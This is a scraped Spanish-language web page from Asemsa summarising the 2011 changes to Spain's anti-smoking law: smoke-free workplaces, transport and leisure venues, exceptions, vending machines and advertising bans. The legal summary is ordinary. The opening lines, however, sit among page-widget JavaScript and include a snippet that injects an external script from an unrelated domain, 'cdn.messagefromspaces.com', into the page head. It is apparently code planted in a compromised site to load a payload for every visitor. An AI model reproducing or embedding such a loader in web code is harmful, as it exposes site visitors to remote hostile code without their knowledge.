Aplicaciones de la nueva ley anti-tabaco | Asemsa , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Aplicaciones de la nueva ley anti-tabaco

El pasado 2 de enero de 2011 entraron en vigor las modificaciones de la Ley 28/2005, realizadas por la Ley 42/2010 publicada en el BOE del 31 de Diciembre de 2010.

La esencia de la Ley viene a prohibir fumar en todo sitio cerrado que vaya a estar compartido con otras personas. Hay excepciones en dos sentidos: espacios cubiertos en los que sí se va a poder fumar, y otros abiertos en los que no. Muchas de estas excepciones ya estaban en la ley anterior, pero su reiterado incumplimiento hizo que se aclararán y ampliaran.

*Respecto a los espacios cerrados públicos en los que no se podrá fumar:*

*No se podrá fumar en los lugares de Trabajo*

- Centros de trabajo públicos y privados, salvo en los espacios al aire libre. (No se podrá fumar en un despacho propio si está en una empresa porque es un lugar de trabajo. Cuando sean despachos particulares y se pueda considerar parte del domicilio de uno, sí, siempre y cuando no se reciba a clientes o a otros trabajadores.)

- Centros y dependencias de las Administraciones públicas y entidades de Derecho público.

- Centros, servicios o establecimientos sanitarios, así como en los espacios al aire libre o cubiertos, comprendidos en sus recintos.* *En los establecimientos psiquiátricos de larga estancia y en las prisiones se
podrán habilitar zonas para fumar, ya que se asimilan a la vivienda habitual de los ingresados. No podrán estar en las habitaciones.

- Centros docentes y formativos, salvo en los espacios al aire libre de los centros universitarios y de los exclusivamente dedicados a la formación de adultos, siempre que no sean accesos inmediatos a los edificios
o aceras circundantes.

- Zonas destinadas a la atención directa al público.

- Centros de atención social. En los centros residenciales de mayores o de personas con discapacidad, se podrá habilitar una zona específica para fumadores, cuyo uso será exclusivo para residentes y deberá estar debida y visiblemente señalizada y contar con ventilación independiente o con otros dispositivos para la eliminación de humos, no pudiendo extenderse el permiso de fumar a las habitaciones ni al resto de las zonas comunes en dichos centros.

- En los establecimientos penitenciarios se permite fumar a los internos en las zonas exteriores de sus edificios al aire libre, o en las salas cerradas habilitadas al efecto, que deberán estar debida y visiblemente señalizadas y contar con ventilación independiente o con otros dispositivos para la eliminación de humos.

En los centros o dependencias en los que existe prohibición legal de fumar *deberán colocarse en su entrada, en lugar visible, carteles que anuncien la prohibición del consumo de tabaco *y los lugares, en los que, en su caso, se encuentren las zonas habilitadas para fumar. Estos carteles estarán redactados en castellano y en la lengua cooficial con las exigencias requeridas por las normas autonómicas correspondientes.

*No se podrá fumar en lugares de reducido tamaño*

- Ascensores y elevadores, Cabinas telefónicas, recintos de los cajeros automáticos y otros espacios cerrados de uso público de reducido tamaño. Se entiende por espacio de uso público de reducido tamaño aquel que no ocupe una extensión superior a cinco metros cuadrados.

*No se podrá fumar en medios de Transporte*

- Estaciones de autobuses, salvo en los espacios que se encuentren al aire libre, vehículos o medios de transporte colectivo urbano e interurbano, vehículos de transporte de empresa, taxis, ambulancias, funiculares y teleféricos. Todos los espacios del transporte suburbano (vagones, andenes, pasillos, escaleras, estaciones, etc.), salvo en los espacios que se encuentren por completo al aire libre. Estaciones, puertos y medios de transporte ferroviario y marítimo, salvo en los espacios al aire libre. Aeropuertos, salvo en los espacios que se encuentren al aire libre, aeronaves con origen y destino en territorio nacional y en todos los vuelos de compañías aéreas españolas, incluidos aquellos compartidos con vuelos de compañías extranjeras.

- Estaciones de servicio y similares.

*No se podrá fumar en los Centros de ocio o esparcimiento, salvo en los espacios al aire libre*

- Centros comerciales, incluyendo grandes superficies y galerías, salvo en los espacios al aire libre.

- Instalaciones deportivas y lugares donde se desarrollen espectáculos públicos, siempre que no sean al aire libre.

- Hoteles, hostales y establecimientos análogos, salvo en los espacios al aire libre. No obstante, podrán habilitarse habitaciones fijas para fumadores (no podrá ser más del 30%), siempre que cumplan con los requisitos establecidos en el artículo 8. En los sitios donde haya habitaciones para fumadores, solo se podrá fumar en ellas: ni en pasillos, ni en ascensores, ni en vestíbulos, por ejemplo.

- Bares, restaurantes y demás establecimientos de restauración cerrados. Salas de teatro, cine y otros espectáculos públicos que se realizan en espacios cerrados.

- Recintos de los parques infantiles y áreas o zonas de juego para la infancia, entendiendo por tales los espacios al aire libre acotados que contengan equipamiento o acondicionamientos destinados específicamente para el juego y esparcimiento de menores.

- Centros culturales, salas de lectura, exposición, biblioteca, conferencias y museos.

- Salas de fiesta, establecimientos de juego (casinos) o de uso público en general, salvo en los espacios al aire libre. Por ello los clubes de fumadores tendrá que modificarse reformarse. Tampoco podrán dedicarse a la venta de bebidas.

- Áreas o establecimientos donde se elaboren, transformen, preparen, degusten o vendan alimento.

- No se podrá fumar en fiestas privadas, como bodas o bautizos cuando se hagan en un local público (un restaurante o un hotel).

En todos los demás espacios cerrados de uso público o colectivo. Cualquier otro lugar en el que, por mandato de esta Ley o de otra norma o por decisión de su titular, se prohíba fumar.

*Respecto a los sitios al aire libre donde no se podrá fumar:*

- Los que estén dentro del recinto de un centro educativo o sanitario (patios, zonas de comunicación entre pabellones), a la entrada de los centros sanitarios y los parques marcados como zonas infantiles. (zonas marcadas como tales o con columpios).

- No se podrá fumar en los locales de las comunidades de vecinos y otros espacios comunes que estén cerrados (portal, pasillos) que se consideran zonas de uso colectivo. En los espacios al aire libre (jardines, piscinas, instalaciones deportivas) sí que se puede.

- En los estadios y las plazas de toro se puede fumar en las zonas al descubierto, pero no en las partes cerradas (vomitorios, taquillas, etcétera) o si son pabellones cerrados.**

- En los aeropuertos se eliminarán las cabinas para fumar. Solo se podrá fumar en los sitios al aire libre.**

- En los espacios al aire libre de los medios de transporte hay una distinción. En general, no se puede fumar, salvo en las cubiertas de los barcos. En cambio, si se trata del piso de arriba de una guagua turística, por ejemplo, no se puede fumar, porque es un medio de transporte urbano.

*Respeto a la ubicación de las máquinas de Tabaco*

- Las máquinas expendedoras de productos del tabaco sólo podrán ubicarse en el interior de quioscos de prensa situados en la vía pública y en locales cuya actividad principal sea la venta de prensa con acceso directo a la vía pública, en las tiendas de conveniencia previstas en el artículo 5.4 de la Ley 1/2004, de 21 de diciembre, de Horarios Comerciales, que estén ubicadas en estaciones de servicio, así como en aquellos locales a los que se refieren las letras k), t) y u) del artículo 7 en una localización que permita la vigilancia directa y permanente de su uso por parte del titular del local o de sus trabajadores. En paralelo a la venta a través de máquinas expendedoras, se permitirá la venta manual de cigarros y cigarritos provistos de capa natural en dichos locales que cuenten con la autorización administrativa otorgada por el Comisionado para el Mercado de Tabaco.»

*Limitaciones de la publicidad, promoción y patrocinio de los productos del tabaco (artículo 9)*

- Queda prohibido el patrocinio de los productos del tabaco, así como toda clase de publicidad, y promoción de los citados productos en todos los medios y soportes, incluidas las máquinas expendedoras y los servicios de la sociedad de la información, con determinadas excepciones (publicaciones de profesionales del tabaco, presentaciones de productos del tabaco a profesionales del sector en el marco de la Ley 13/1998.

- Se prohíbe, fuera de la red de expendedurías de tabaco y timbre del Estado, la distribución gratuita o promocional de productos, bienes o servicios o cualquier otra actuación, cuyo objetivo o efecto directo o indirecto, principal o secundario, sea la promoción de un producto del tabaco.

* *

- *Y como novedad* se incluye que se prohíbe en todos los medios de comunicación, incluidos los servicios de la sociedad de la información, la emisión de programas o de imágenes en los que los presentadores, colaboradores o invitados aparezcan fumando y que se mencionen o muestren, directa o indirectamente, marcas, nombres comerciales, logotipos u otros signos identificativos o asociados a productos del tabaco.»

*Respecto al Régimen especial de la Comunidad Autónoma de Canarias.*

Se modifica la disposición adicional cuarta, incluyendo la aplicación del artículo 9, que dando redactado del siguiente modo:

«Lo dispuesto en esta Ley se entiende sin perjuicio de las peculiaridades del Régimen Económico Fiscal de Canarias, respecto de la libertad comercial de los productos del tabaco en los establecimientos comerciales situados en
el archipiélago canario, sin que esta excepción suponga limitación en la aplicación de las demás prescripciones contenidas en esta Ley, en especial lo previsto en las letras a), b), c), d), e) y f) del artículo 5, *en el artículo 9*, y, en todo caso, las destinadas a la protección de menores.»

Aviso Legal | Política de Privacidad | Desarrollado por E-Armas Consultores